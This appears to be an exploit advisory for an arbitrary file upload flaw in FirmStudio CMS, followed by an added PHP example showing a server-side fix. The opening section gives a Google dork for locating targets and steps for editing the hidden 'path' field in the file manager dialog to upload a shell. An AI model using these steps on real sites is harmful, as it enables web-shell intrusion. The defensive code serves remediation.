FirmStudio CMS (filemanager) Arbitrary File Upload

# Exploit Title : FirmStudio CMS (filemanager) Arbitrary File Upload
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.firmstudio.com
# Google Dork : intext:"Website by FirmStudio"
# Date: 23 May 2016
# Tested On : Kali
# Contact:n3t.hacker@gmail.com
######################
# Exploit:include/filemanager/dialog.php
# Description : Search the dork and select a target. Append include/filemanager/dialog.php to the URL, such as:
# http://site.com/include/filemanager/dialog.php
# Now hold the Shift key and right-click -> Inspect Element
# Find : <input name="path" value="/client/site/site/uploaded_files/" type="hidden">
# You can change the upload dir and upload a shell
# Demo :
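
The root cause described above is that the upload directory comes from the client-editable hidden field `path`. The following is an added example of server-side handling that closes it, not FirmStudio's code: `UPLOAD_ROOT`, `ALLOWED_EXT`, `resolve_upload_target()` and the `file` field name are hypothetical, and the posted `path` is assumed to be interpreted relative to a fixed base directory.

```php
<?php
// Added example, not FirmStudio code. All names below are hypothetical.
const UPLOAD_ROOT = '/var/www/site/uploaded_files';   // assumed fixed server-side base
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];

/**
 * Map the client-supplied "path" and filename to a safe target path,
 * or return null if the request must be rejected.
 */
function resolve_upload_target(string $clientPath, string $clientName): ?string
{
    $root = realpath(UPLOAD_ROOT);
    if ($root === false) {
        return null;                                   // base directory missing
    }
    // Treat "path" as relative to the root only; realpath resolves ".." and symlinks.
    $dir = realpath($root . DIRECTORY_SEPARATOR . ltrim($clientPath, '/\\'));
    if ($dir === false || !is_dir($dir)) {
        return null;
    }
    // The canonical directory must be the root itself or lie below it.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($dir !== $root && strncmp($dir, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Drop any directory part of the filename and restrict its character set.
    $name = basename(str_replace('\\', '/', $clientName));
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$/', $name)) {
        return null;
    }
    // Exactly one extension, taken from an allow-list (rejects x.php and x.php.jpg).
    $parts = explode('.', strtolower($name));
    if (count($parts) !== 2 || !in_array($parts[1], ALLOWED_EXT, true)) {
        return null;
    }
    // Store under a server-generated name so the uploader cannot choose it.
    return $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $parts[1];
}

// Usage inside an upload handler; "path" is the field shown above, "file" is assumed.
if (isset($_FILES['file'], $_POST['path']) && is_uploaded_file($_FILES['file']['tmp_name'])) {
    $target = resolve_upload_target($_POST['path'], $_FILES['file']['name']);
    if ($target === null || !move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        http_response_code(400);
        exit('upload rejected');
    }
}
```

Disabling script execution for the upload directory in the web server configuration is a complementary control, so that a file that does slip through is served as data rather than run.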
